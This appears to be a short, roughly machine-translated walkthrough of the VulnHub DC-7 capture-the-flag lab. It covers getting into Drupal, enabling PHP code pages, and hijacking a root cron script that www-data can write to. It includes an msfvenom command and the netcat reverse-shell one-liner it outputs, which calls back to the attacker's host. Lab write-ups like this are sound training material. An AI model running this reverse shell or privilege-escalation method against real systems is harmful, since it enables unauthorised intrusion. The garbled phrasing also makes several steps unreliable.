Drone Download:
https://www.vulnhub.com/entry/dc-7,356/
Host Scan:
http://10.10.202.161/
Google Search under:
SSH login
The above analysis results: this is the root script execution once every three minutes, and www-data user has write access, and therefore need to find ways to obtain this permission, write shell to rebound
https://www.digitalocean.com/community/tutorials/a-beginner-s-guide-to-drush-the-drupal-shel
We click on a PHP extension module installed
https://www.drupal.org/project/php
Create a basic web page, select PHP code
Write shell
Local listeners get shell root privileges
Waiting more than 30 minutes without shell round, and he did not perform, this. . . . It another way
╰─ msfvenom -p cmd/unix/reverse_netcat lhost=10.10.202.159 lport=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/iwxe; nc 10.10.202.159 6666 0</tmp/iwxe | /bin/sh >/tmp/iwxe 2>&1; rm /tmp/iwxe
确认已经写入
OVER !